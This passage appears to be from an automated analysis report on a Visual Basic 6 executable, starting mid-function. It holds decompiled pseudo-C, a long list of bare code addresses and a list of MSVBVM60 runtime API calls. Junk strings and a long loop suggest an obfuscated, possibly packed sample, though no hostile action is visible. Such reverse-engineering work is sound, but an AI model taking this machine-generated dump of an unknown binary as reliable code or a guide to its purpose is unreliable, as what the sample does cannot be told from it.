				_t1420 =  *((intOrPtr*)( *_v276 + 0x120))(_v276,  &_v96, _t1416,  *((intOrPtr*)( *((intOrPtr*)( *_v620)) + 0x310))( *_v620));
				asm("fclex");
				_v280 = _t1420;
				if(_v280 >= 0) {
					_v624 = _v624 & 0x00000000;
				} else {
					_push(0x120);
					_push(0x40b49c);
					_push(_v276);
					_push(_v280);
					L004012EC();
					_v624 = _t1420;
				}
				_v356 = _v96;
				_v96 = _v96 & 0x00000000;
				_v136 = _v356;
				_v144 = 9;
				_v216 = _v236;
				_v224 = 3;
				_v200 = L"HALFPACE";
				_v208 = 8;
				L004012D4();
				L004011F0();
				_t1622 =  &_v224;
				_t1609 = _t1648;
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *((intOrPtr*)( *_a4 + 0x718))(_a4,  &_v128, 0x10,  &_v144,  &_v256);
				_v36 = _v256;
				_v32 = _v252;
				_push( &_v92);
				_push( &_v88);
				_push(2);
				L004012CE();
				_push( &_v144);
				_push( &_v128);
				_push(2);
				L00401334();
				_t1645 = _t1648 + 0x18;
				if( *0x410010 != 0) {
					_v628 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v628 = 0x410010;
				}
				_t1440 =  &_v88;
				L004012E6();
				_v268 = _t1440;
				_t1444 =  *((intOrPtr*)( *_v268 + 0xf8))(_v268,  &_v80, _t1440,  *((intOrPtr*)( *((intOrPtr*)( *_v628)) + 0x308))( *_v628));
				asm("fclex");
				_v272 = _t1444;
				if(_v272 >= 0) {
					_v632 = _v632 & 0x00000000;
				} else {
					_push(0xf8);
					_push(0x40b424);
					_push(_v268);
					_push(_v272);
					L004012EC();
					_v632 = _t1444;
				}
				L00401322();
				_v236 = 0x43683d;
				_v360 = _v80;
				_v80 = _v80 & 0x00000000;
				_v120 = _v360;
				_v128 = 8;
				_t1452 =  *((intOrPtr*)( *_a4 + 0x6fc))(_a4,  &_v128,  &_v236,  &_v84);
				_v276 = _t1452;
				if(_v276 >= 0) {
					_v636 = _v636 & 0x00000000;
				} else {
					_push(0x6fc);
					_push(0x40b17c);
					_push(_a4);
					_push(_v276);
					L004012EC();
					_v636 = _t1452;
				}
				L00401364();
				L004012DA();
				L00401352();
				_t1454 = _v28 + 1;
				if(_t1454 < 0) {
					goto L213;
				}
				_v28 = _t1454;
				if(_v28 < 0x1ab0b) {
					goto L148;
				}
				_t1472 =  *((intOrPtr*)( *_a4 + 0x708))(_a4);
				_v8 = 0;
				asm("wait");
				_push(E0040E231);
				L00401352();
				return _t1472;
				L213:
				L004012FE();
				_t1650 = _t1645 - 0xc;
				 *[fs:0x0] = _t1650;
				L004011F0();
				_v1044 = _t1650;
				_v1040 = 0x401160;
				_v1036 = 0;
				 *((intOrPtr*)( *_v1024 + 4))(_v1024, _t1609, _t1622, _t1478, 0x4c,  *[fs:0x0], 0x4011f6, _t1629);
				if( *0x410010 != 0) {
					_v100 = 0x410010;
				} else {
					_push(0x410010);
					_push(0x40a880);
					L004012E0();
					_v100 = 0x410010;
				}
				_t1592 =  *((intOrPtr*)( *_v100));
				_t1463 =  &_v32;
				L004012E6();
				_v84 = _t1463;
				_v72 = 0x80020004;
				_v80 = 0xa;
				_v56 = 0x80020004;
				_v64 = 0xa;
				_v40 = 0x80020004;
				_v48 = 0xa;
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L004011F0();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				 *_t1650 =  *0x401158;
				_t1469 =  *((intOrPtr*)( *_v84 + 0x178))(_v84, _t1592, 0x10, 0x10, 0x10, _t1463,  *((intOrPtr*)(_t1592 + 0x318))( *_v100));
				asm("fclex");
				_v88 = _t1469;
				if(_v88 >= 0) {
					_v104 = _v104 & 0x00000000;
				} else {
					_push(0x178);
					_push(0x40b49c);
					_push(_v84);
					_push(_v88);
					L004012EC();
					_v104 = _t1469;
				}
				L004012DA();
				asm("wait");
				_push(E0040E395);
				return _t1469;
			}

0x0040c16a
0x0040c16b
0x0040c16d
0x0040c17c
0x0040c188
0x0040c190
0x0040c193
0x0040c1a0
0x0040c1a9
0x0040c1b4
0x0040c1b7
0x0040c1bc
0x0040c1c4
0x0040c1ca
0x0040c1d4
0x0040c1de
0x0040c1e8
0x0040c1f5
0x0040c202
0x0040c203
0x0040c204
0x0040c205
0x0040c209
0x0040c216
0x0040c217
0x0040c218
0x0040c219
0x0040c222
0x0040c228
0x0040c22a
0x0040c237
0x0040c259
0x0040c239
0x0040c239
0x0040c23e
0x0040c243
0x0040c246
0x0040c24c
0x0040c251
0x0040c251
0x0040c237
0x0040c267
0x0040c284
0x0040c269
0x0040c269
0x0040c26e
0x0040c273
0x0040c278
0x0040c278
0x0040c2a8
0x0040c2ac
0x0040c2b1
0x0040c2c9
0x0040c2cf
0x0040c2d1
0x0040c2de
0x0040c303
0x0040c2e0
0x0040c2e0
0x0040c2e5
0x0040c2ea
0x0040c2f0
0x0040c2f6
0x0040c2fb
0x0040c2fb
0x0040c312
0x0040c317
0x0040c324
0x0040c32a
0x0040c334
0x0040c337
0x0040c342
0x0040c355
0x0040c35b
0x0040c368
0x0040c38a
0x0040c36a
0x0040c36a
0x0040c36f
0x0040c374
0x0040c377
0x0040c37d
0x0040c382
0x0040c382
0x0040c394
0x0040c39c
0x0040c3a4
0x0040c3b0
0x0040c3cd
0x0040c3b2
0x0040c3b2
0x0040c3b7
0x0040c3bc
0x0040c3c1
0x0040c3c1
0x0040c3f1
0x0040c3f5
0x0040c3fa
0x0040c400
0x0040c415
0x0040c418
0x0040c41a
0x0040c427
0x0040c449
0x0040c429
0x0040c429
0x0040c42b
0x0040c430
0x0040c436
0x0040c43c
0x0040c441
0x0040c441
0x0040c457
0x0040c474
0x0040c459
0x0040c459
0x0040c45e
0x0040c463
0x0040c468
0x0040c468
0x0040c498
0x0040c49c
0x0040c4a1
0x0040c4bc
0x0040c4bf
0x0040c4c1
0x0040c4ce
0x0040c4f0
0x0040c4d0
0x0040c4d0
0x0040c4d2
0x0040c4d7
0x0040c4dd
0x0040c4e3
0x0040c4e8
0x0040c4e8
0x0040c4fe
0x0040c51b
0x0040c500
0x0040c500
0x0040c505
0x0040c50a
0x0040c50f
0x0040c50f
0x0040c53f
0x0040c543
0x0040c548
0x0040c563
0x0040c566
0x0040c568
0x0040c575
0x0040c597
0x0040c577
0x0040c577
0x0040c579
0x0040c57e
0x0040c584
0x0040c58a
0x0040c58f
0x0040c58f
0x0040c59e
0x0040c5a8
0x0040c5b2
0x0040c5bb
0x0040c5c5
0x0040c5d5
0x0040c5db
0x0040c5e5
0x0040c5f8
0x0040c626
0x0040c64c
0x0040c658
0x0040c661
0x0040c667
0x0040c66b
0x0040c66f
0x0040c670
0x0040c672
0x0040c680
0x0040c684
0x0040c685
0x0040c687
0x0040c68c
0x0040c696
0x0040c6b3
0x0040c698
0x0040c698
0x0040c69d
0x0040c6a2
0x0040c6a7
0x0040c6a7
0x0040c6d7
0x0040c6db
0x0040c6e0
0x0040c6fb
0x0040c701
0x0040c703
0x0040c710
0x0040c735
0x0040c712
0x0040c712
0x0040c717
0x0040c71c
0x0040c722
0x0040c728
0x0040c72d
0x0040c72d
0x0040c743
0x0040c760
0x0040c745
0x0040c745
0x0040c74a
0x0040c74f
0x0040c754
0x0040c754
0x0040c784
0x0040c788
0x0040c78d
0x0040c7a5
0x0040c7ab
0x0040c7ad
0x0040c7ba
0x0040c7df
0x0040c7bc
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x0040c7cc
0x0040c7d2
0x0040c7d7
0x0040c7d7
0x0040c7ed
0x0040c80a
0x0040c7ef
0x0040c7ef
0x0040c7f4
0x0040c7f9
0x0040c7fe
0x0040c7fe
0x0040c82e
0x0040c832
0x0040c837
0x0040c852
0x0040c858
0x0040c85a
0x0040c867
0x0040c88c
0x0040c869
0x0040c869
0x0040c86e
0x0040c873
0x0040c879
0x0040c87f
0x0040c884
0x0040c884
0x0040c89a
0x0040c8b7
0x0040c89c
0x0040c89c
0x0040c8a1
0x0040c8a6
0x0040c8ab
0x0040c8ab
0x0040c8db
0x0040c8df
0x0040c8e4
0x0040c8ff
0x0040c905
0x0040c907
0x0040c914
0x0040c939
0x0040c916
0x0040c916
0x0040c91b
0x0040c920
0x0040c926
0x0040c92c
0x0040c931
0x0040c931
0x0040c947
0x0040c964
0x0040c949
0x0040c949
0x0040c94e
0x0040c953
0x0040c958
0x0040c958
0x0040c988
0x0040c98c
0x0040c991
0x0040c9a9
0x0040c9af
0x0040c9b1
0x0040c9be
0x0040c9e3
0x0040c9c0
0x0040c9c0
0x0040c9c5
0x0040c9ca
0x0040c9d0
0x0040c9d6
0x0040c9db
0x0040c9db
0x0040c9f8
0x0040c9fd
0x0040ca06
0x0040ca13
0x0040ca22
0x0040ca2a
0x0040ca30
0x0040ca3a
0x0040ca3d
0x0040ca4a
0x0040ca57
0x0040ca5e
0x0040ca7e
0x0040ca88
0x0040ca89
0x0040ca8a
0x0040ca8b
0x0040ca9b
0x0040caa1
0x0040caae
0x0040cad0
0x0040cab0
0x0040cab0
0x0040cab5
0x0040caba
0x0040cabd
0x0040cac3
0x0040cac8
0x0040cac8
0x0040cadd
0x0040cae6
0x0040caec
0x0040cb0b
0x0040cb20
0x0040cb25
0x0040cb28
0x0040cb32
0x0040cb44
0x0040cb51
0x0040cb52
0x0040cb53
0x0040cb54
0x0040cb62
0x0040cb6f
0x0040cb8c
0x0040cb71
0x0040cb71
0x0040cb76
0x0040cb7b
0x0040cb80
0x0040cb80
0x0040cbb0
0x0040cbb4
0x0040cbb9
0x0040cbd4
0x0040cbda
0x0040cbdc
0x0040cbe9
0x0040cc0e
0x0040cbeb
0x0040cbeb
0x0040cbf0
0x0040cbf5
0x0040cbfb
0x0040cc01
0x0040cc06
0x0040cc06
0x0040cc1c
0x0040cc39
0x0040cc1e
0x0040cc1e
0x0040cc23
0x0040cc28
0x0040cc2d
0x0040cc2d
0x0040cc5d
0x0040cc61
0x0040cc66
0x0040cc7e
0x0040cc84
0x0040cc86
0x0040cc93
0x0040ccb8
0x0040cc95
0x0040cc95
0x0040cc9a
0x0040cc9f
0x0040cca5
0x0040ccab
0x0040ccb0
0x0040ccb0
0x0040ccc2
0x0040ccc8
0x0040ccd2
0x0040ccd8
0x0040cce8
0x0040ccee
0x0040ccf8
0x0040cd02
0x0040cd15
0x0040cd2b
0x0040cd38
0x0040cd39
0x0040cd3a
0x0040cd3b
0x0040cd48
0x0040cd54
0x0040cd5d
0x0040cd63
0x0040cd67
0x0040cd68
0x0040cd6a
0x0040cd78
0x0040cd7c
0x0040cd7d
0x0040cd7f
0x0040cd84
0x0040cd8e
0x0040cdab
0x0040cd90
0x0040cd90
0x0040cd95
0x0040cd9a
0x0040cd9f
0x0040cd9f
0x0040cdcf
0x0040cdd3
0x0040cdd8
0x0040cdf0
0x0040cdf6
0x0040cdf8
0x0040ce05
0x0040ce2a
0x0040ce07
0x0040ce07
0x0040ce0c
0x0040ce11
0x0040ce17
0x0040ce1d
0x0040ce22
0x0040ce22
0x0040ce31
0x0040ce33
0x0040ce35
0x0040ce3b
0x0040ce3c
0x0040ce41
0x0040ce4b
0x0040ce68
0x0040ce4d
0x0040ce4d
0x0040ce52
0x0040ce57
0x0040ce5c
0x0040ce5c
0x0040ce8c
0x0040ce90
0x0040ce95
0x0040cead
0x0040ceb3
0x0040ceb5
0x0040cec2
0x0040cee7
0x0040cec4
0x0040cec4
0x0040cec9
0x0040cece
0x0040ced4
0x0040ceda
0x0040cedf
0x0040cedf
0x0040cef5
0x0040cf12
0x0040cef7
0x0040cef7
0x0040cefc
0x0040cf01
0x0040cf06
0x0040cf06
0x0040cf36
0x0040cf3a
0x0040cf3f
0x0040cf5a
0x0040cf60
0x0040cf62
0x0040cf6f
0x0040cf94
0x0040cf71
0x0040cf71
0x0040cf76
0x0040cf7b
0x0040cf81
0x0040cf87
0x0040cf8c
0x0040cf8c
0x0040cfa2
0x0040cfbf
0x0040cfa4
0x0040cfa4
0x0040cfa9
0x0040cfae
0x0040cfb3
0x0040cfb3
0x0040cfe3
0x0040cfe7
0x0040cfec
0x0040d004
0x0040d00a
0x0040d00c
0x0040d019
0x0040d03e
0x0040d01b
0x0040d01b
0x0040d020
0x0040d025
0x0040d02b
0x0040d031
0x0040d036
0x0040d036
0x0040d04c
0x0040d069
0x0040d04e
0x0040d04e
0x0040d053
0x0040d058
0x0040d05d
0x0040d05d
0x0040d083
0x0040d08d
0x0040d091
0x0040d096
0x0040d0b1
0x0040d0b4
0x0040d0b6
0x0040d0c3
0x0040d0e5
0x0040d0c5
0x0040d0c5
0x0040d0c7
0x0040d0cc
0x0040d0d2
0x0040d0d8
0x0040d0dd
0x0040d0dd
0x0040d0ec
0x0040d0f6
0x0040d100
0x0040d10d
0x0040d113
0x0040d11d
0x0040d123
0x0040d130
0x0040d136
0x0040d140
0x0040d146
0x0040d16e
0x0040d17b
0x0040d17c
0x0040d17d
0x0040d17e
0x0040d186
0x0040d19a
0x0040d19e
0x0040d1ac
0x0040d1bb
0x0040d1c3
0x0040d1c7
0x0040d1cb
0x0040d1cf
0x0040d1d3
0x0040d1d7
0x0040d1d8
0x0040d1da
0x0040d1e8
0x0040d1ef
0x0040d1f6
0x0040d1fa
0x0040d1fb
0x0040d1fd
0x0040d202
0x0040d20c
0x0040d229
0x0040d20e
0x0040d20e
0x0040d213
0x0040d218
0x0040d21d
0x0040d21d
0x0040d24d
0x0040d251
0x0040d256
0x0040d271
0x0040d274
0x0040d276
0x0040d283
0x0040d2a5
0x0040d285
0x0040d285
0x0040d287
0x0040d28c
0x0040d292
0x0040d298
0x0040d29d
0x0040d29d
0x0040d2b3
0x0040d2d0
0x0040d2b5
0x0040d2b5
0x0040d2ba
0x0040d2bf
0x0040d2c4
0x0040d2c4
0x0040d2f4
0x0040d2f8
0x0040d2fd
0x0040d315
0x0040d31b
0x0040d31d
0x0040d32a
0x0040d34f
0x0040d32c
0x0040d32c
0x0040d331
0x0040d336
0x0040d33c
0x0040d342
0x0040d347
0x0040d347
0x0040d35d
0x0040d37a
0x0040d35f
0x0040d35f
0x0040d364
0x0040d369
0x0040d36e
0x0040d36e
0x0040d39e
0x0040d3a2
0x0040d3a7
0x0040d3c2
0x0040d3c8
0x0040d3ca
0x0040d3d7
0x0040d3fc
0x0040d3d9
0x0040d3d9
0x0040d3de
0x0040d3e3
0x0040d3e9
0x0040d3ef
0x0040d3f4
0x0040d3f4
0x0040d409
0x0040d40f
0x0040d416
0x0040d41d
0x0040d427
0x0040d437
0x0040d443
0x0040d490
0x0040d49c
0x0040d4a2
0x0040d4aa
0x0040d4ae
0x0040d4b2
0x0040d4b3
0x0040d4b5
0x0040d4ba
0x0040d4c0
0x0040d4cc
0x0040d4e9
0x0040d4ce
0x0040d4ce
0x0040d4d3
0x0040d4d8
0x0040d4dd
0x0040d4dd
0x0040d50d
0x0040d511
0x0040d516
0x0040d52e
0x0040d531
0x0040d533
0x0040d540
0x0040d562
0x0040d542
0x0040d542
0x0040d544
0x0040d549
0x0040d54f
0x0040d555
0x0040d55a
0x0040d55a
0x0040d570
0x0040d58d
0x0040d572
0x0040d572
0x0040d577
0x0040d57c
0x0040d581
0x0040d581
0x0040d5b1
0x0040d5b5
0x0040d5ba
0x0040d5d2
0x0040d5d8
0x0040d5da
0x0040d5e7
0x0040d60c
0x0040d5e9
0x0040d5e9
0x0040d5ee
0x0040d5f3
0x0040d5f9
0x0040d5ff
0x0040d604
0x0040d604
0x0040d61a
0x0040d637
0x0040d61c
0x0040d61c
0x0040d621
0x0040d626
0x0040d62b
0x0040d62b
0x0040d65b
0x0040d65f
0x0040d664
0x0040d67f
0x0040d682
0x0040d684
0x0040d691
0x0040d6b3
0x0040d693
0x0040d693
0x0040d695
0x0040d69a
0x0040d6a0
0x0040d6a6
0x0040d6ab
0x0040d6ab
0x0040d6ba
0x0040d6c4
0x0040d6d4
0x0040d6da
0x0040d6e7
0x0040d6ed
0x0040d6f7
0x0040d6fd
0x0040d707
0x0040d714
0x0040d71a
0x0040d724
0x0040d727
0x0040d72e
0x0040d738
0x0040d766
0x0040d770
0x0040d771
0x0040d772
0x0040d773
0x0040d783
0x0040d789
0x0040d796
0x0040d7b8
0x0040d798
0x0040d798
0x0040d79d
0x0040d7a2
0x0040d7a5
0x0040d7ab
0x0040d7b0
0x0040d7b0
0x0040d7cd
0x0040d7e9
0x0040d7ee
0x0040d7f9
0x0040d7ff
0x0040d801
0x0040d80e
0x0040d830
0x0040d810
0x0040d810
0x0040d815
0x0040d81a
0x0040d81d
0x0040d823
0x0040d828
0x0040d828
0x00000000
0x0040d837
0x0040d83e
0x0040d85b
0x0040d840
0x0040d840
0x0040d845
0x0040d84a
0x0040d84f
0x0040d84f
0x0040d87f
0x0040d883
0x0040d888
0x0040d8a3
0x0040d8a6
0x0040d8a8
0x0040d8b5
0x0040d8d7
0x0040d8b7
0x0040d8b7
0x0040d8b9
0x0040d8be
0x0040d8c4
0x0040d8ca
0x0040d8cf
0x0040d8cf
0x0040d8e5
0x0040d902
0x0040d8e7
0x0040d8e7
0x0040d8ec
0x0040d8f1
0x0040d8f6
0x0040d8f6
0x0040d926
0x0040d92a
0x0040d92f
0x0040d947
0x0040d94d
0x0040d94f
0x0040d95c
0x0040d981
0x0040d95e
0x0040d95e
0x0040d963
0x0040d968
0x0040d96e
0x0040d974
0x0040d979
0x0040d979
0x0040d98f
0x0040d9ac
0x0040d991
0x0040d991
0x0040d996
0x0040d99b
0x0040d9a0
0x0040d9a0
0x0040d9d0
0x0040d9d4
0x0040d9d9
0x0040d9f4
0x0040d9fa
0x0040d9fc
0x0040da09
0x0040da2e
0x0040da0b
0x0040da0b
0x0040da10
0x0040da15
0x0040da1b
0x0040da21
0x0040da26
0x0040da26
0x0040da3b
0x0040da41
0x0040da48
0x0040da4f
0x0040da59
0x0040da69
0x0040da75
0x0040dac2
0x0040dace
0x0040dad4
0x0040dadc
0x0040dae0
0x0040dae4
0x0040dae5
0x0040dae7
0x0040daec
0x0040daf2
0x0040dafe
0x0040db1b
0x0040db00
0x0040db00
0x0040db05
0x0040db0a
0x0040db0f
0x0040db0f
0x0040db3f
0x0040db43
0x0040db48
0x0040db60
0x0040db63
0x0040db65
0x0040db72
0x0040db94
0x0040db74
0x0040db74
0x0040db76
0x0040db7b
0x0040db81
0x0040db87
0x0040db8c
0x0040db8c
0x0040dba2
0x0040dbbf
0x0040dba4
0x0040dba4
0x0040dba9
0x0040dbae
0x0040dbb3
0x0040dbb3
0x0040dbe3
0x0040dbe7
0x0040dbec
0x0040dc04
0x0040dc0a
0x0040dc0c
0x0040dc19
0x0040dc3e
0x0040dc1b
0x0040dc1b
0x0040dc20
0x0040dc25
0x0040dc2b
0x0040dc31
0x0040dc36
0x0040dc36
0x0040dc4c
0x0040dc69
0x0040dc4e
0x0040dc4e
0x0040dc53
0x0040dc58
0x0040dc5d
0x0040dc5d
0x0040dc8d
0x0040dc91
0x0040dc96
0x0040dcb1
0x0040dcb4
0x0040dcb6
0x0040dcc3
0x0040dce5
0x0040dcc5
0x0040dcc5
0x0040dcc7
0x0040dccc
0x0040dcd2
0x0040dcd8
0x0040dcdd
0x0040dcdd
0x0040dcec
0x0040dcf6
0x0040dd06
0x0040dd0c
0x0040dd19
0x0040dd1f
0x0040dd29
0x0040dd2f
0x0040dd39
0x0040dd46
0x0040dd4c
0x0040dd56
0x0040dd59
0x0040dd60
0x0040dd6a
0x0040dd98
0x0040dda2
0x0040dda3
0x0040dda4
0x0040dda5
0x0040ddb5
0x0040ddbb
0x0040ddc8
0x0040ddea
0x0040ddca
0x0040ddca
0x0040ddcf
0x0040ddd4
0x0040ddd7
0x0040dddd
0x0040dde2
0x0040dde2
0x0040ddf4
0x0040ddf8
0x0040ddfc
0x0040ddfd
0x0040ddff
0x0040de0d
0x0040de14
0x0040de18
0x0040de19
0x0040de1b
0x0040de20
0x0040de2a
0x0040de47
0x0040de2c
0x0040de2c
0x0040de31
0x0040de36
0x0040de3b
0x0040de3b
0x0040de6b
0x0040de6f
0x0040de74
0x0040de8f
0x0040de95
0x0040de97
0x0040dea4
0x0040dec9
0x0040dea6
0x0040dea6
0x0040deab
0x0040deb0
0x0040deb6
0x0040debc
0x0040dec1
0x0040dec1
0x0040ded7
0x0040def4
0x0040ded9
0x0040ded9
0x0040dede
0x0040dee3
0x0040dee8
0x0040dee8
0x0040df18
0x0040df1c
0x0040df21
0x0040df39
0x0040df3f
0x0040df41
0x0040df4e
0x0040df73
0x0040df50
0x0040df50
0x0040df55
0x0040df5a
0x0040df60
0x0040df66
0x0040df6b
0x0040df6b
0x0040df7d
0x0040df83
0x0040df8d
0x0040df93
0x0040dfa3
0x0040dfa9
0x0040dfb3
0x0040dfbd
0x0040dfd0
0x0040dfe6
0x0040dfeb
0x0040dff1
0x0040dff3
0x0040dff4
0x0040dff5
0x0040dff6
0x0040e003
0x0040e00f
0x0040e018
0x0040e01e
0x0040e022
0x0040e023
0x0040e025
0x0040e033
0x0040e037
0x0040e038
0x0040e03a
0x0040e03f
0x0040e049
0x0040e066
0x0040e04b
0x0040e04b
0x0040e050
0x0040e055
0x0040e05a
0x0040e05a
0x0040e08a
0x0040e08e
0x0040e093
0x0040e0ab
0x0040e0b1
0x0040e0b3
0x0040e0c0
0x0040e0e5
0x0040e0c2
0x0040e0c2
0x0040e0c7
0x0040e0cc
0x0040e0d2
0x0040e0d8
0x0040e0dd
0x0040e0dd
0x0040e0f4
0x0040e0f9
0x0040e106
0x0040e10c
0x0040e116
0x0040e119
0x0040e137
0x0040e13d
0x0040e14a
0x0040e16c
0x0040e14c
0x0040e14c
0x0040e151
0x0040e156
0x0040e159
0x0040e15f
0x0040e164
0x0040e164
0x0040e176
0x0040e17e
0x0040e186
0x0040e18e
0x0040e191
0x00000000
0x00000000
0x0040e197
0x0040e1a1
0x00000000
0x0040e1a3
0x0040e1b0
0x0040e1b6
0x0040e1bd
0x0040e1be
0x0040e22b
0x0040e230
0x0040e250
0x0040e250
0x0040e258
0x0040e267
0x0040e271
0x0040e279
0x0040e27c
0x0040e283
0x0040e292
0x0040e29c
0x0040e2b6
0x0040e29e
0x0040e29e
0x0040e2a3
0x0040e2a8
0x0040e2ad
0x0040e2ad
0x0040e2c7
0x0040e2d1
0x0040e2d5
0x0040e2da
0x0040e2dd
0x0040e2e4
0x0040e2eb
0x0040e2f2
0x0040e2f9
0x0040e300
0x0040e30a
0x0040e314
0x0040e315
0x0040e316
0x0040e317
0x0040e31b
0x0040e325
0x0040e326
0x0040e327
0x0040e328
0x0040e32c
0x0040e336
0x0040e337
0x0040e338
0x0040e339
0x0040e341
0x0040e34c
0x0040e352
0x0040e354
0x0040e35b
0x0040e377
0x0040e35d
0x0040e35d
0x0040e362
0x0040e367
0x0040e36a
0x0040e36d
0x0040e372
0x0040e372
0x0040e37e
0x0040e383
0x0040e384
0x00000000

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040C188
__vbaLenBstrB.MSVBVM60(0040B420,?,?,?,?,004011F6), ref: 0040C1BC
__vbaChkstk.MSVBVM60 ref: 0040C1F5
__vbaChkstk.MSVBVM60 ref: 0040C209
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B14C,000002B0), ref: 0040C24C
__vbaNew2.MSVBVM60(0040A880,00410010,0040B420,?,?,?,?,004011F6), ref: 0040C273
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C2AC
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,000000F8), ref: 0040C2F6
__vbaStrCopy.MSVBVM60(00000000,?,0040B424,000000F8), ref: 0040C312
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B17C,000006FC), ref: 0040C37D
__vbaFreeVar.MSVBVM60(00000000,00401148,0040B17C,000006FC), ref: 0040C3A4
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C3BC
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C3F5
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000060), ref: 0040C43C
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C463
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C49C
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040B424,00000060), ref: 0040C4E3
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C50A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C543
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000060), ref: 0040C58A
__vbaVarDup.MSVBVM60(00000000,?,0040B49C,00000060), ref: 0040C5F8
__vbaFreeObjList.MSVBVM60(00000003,?,?,?), ref: 0040C672
__vbaFreeVarList.MSVBVM60(00000002,?,?,?,?,?,004011F6), ref: 0040C687
__vbaNew2.MSVBVM60(0040A880,00410010,?,?,?,?,?,?,004011F6), ref: 0040C6A2
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C6DB
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000178), ref: 0040C728
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C74F
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C788
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000120), ref: 0040C7D2
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C7F9
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C832
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,000000E0), ref: 0040C87F
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C8A6
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C8DF
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B4CC,000000E8), ref: 0040C92C
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040C953
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040C98C
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,000000F0), ref: 0040C9D6
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040C9F8
__vbaStrCopy.MSVBVM60(?,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040CA22
__vbaI4Var.MSVBVM60(?,?), ref: 0040CA5E
__vbaChkstk.MSVBVM60(?,?,?,0001C0C4,00000000,?,?), ref: 0040CA7E
__vbaHresultCheckObj.MSVBVM60(00000000,00401148,0040B17C,00000700), ref: 0040CAC3
__vbaFreeObjList.MSVBVM60(00000006,?,?,?,?,?,?), ref: 0040CB0B
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040CB20
__vbaChkstk.MSVBVM60(snydertampenes), ref: 0040CB44
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CB7B
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CBB4
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000128), ref: 0040CC01
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CC28
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CC61
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000120), ref: 0040CCAB
__vbaVarDup.MSVBVM60(00000000,?,0040B49C,00000120), ref: 0040CD15
__vbaChkstk.MSVBVM60(00000009,?), ref: 0040CD2B
__vbaFreeObjList.MSVBVM60(00000002,?,?), ref: 0040CD6A
__vbaFreeVarList.MSVBVM60(00000002,?,?), ref: 0040CD7F
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CD9A
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CDD3
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B4CC,000000B0), ref: 0040CE1D
__vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000), ref: 0040CE3C
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CE57
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0040CE90
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000148), ref: 0040CEDA
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CF01
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CF3A
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B49C,00000080), ref: 0040CF87
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040CFAE
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040CFE7
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000170), ref: 0040D031
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D058
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D091
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000060), ref: 0040D0D8
__vbaChkstk.MSVBVM60(?,008789B5,00000003,?), ref: 0040D16E
__vbaI4Var.MSVBVM60(?,00000008,8E1C83F0,00005AF9,?,?,008789B5,00000003,?), ref: 0040D19E
__vbaVarMove.MSVBVM60(?,?,008789B5,00000003,?), ref: 0040D1BB
__vbaFreeObjList.MSVBVM60(00000006,?,00000000,?,?,?,?,?,?,008789B5,00000003,?), ref: 0040D1DA
__vbaFreeVarList.MSVBVM60(00000004,?,00000008,00000009,?), ref: 0040D1FD
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D218
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D251
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B424,00000060), ref: 0040D298
__vbaNew2.MSVBVM60(0040A880,00410010), ref: 0040D2BF
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040D2F8
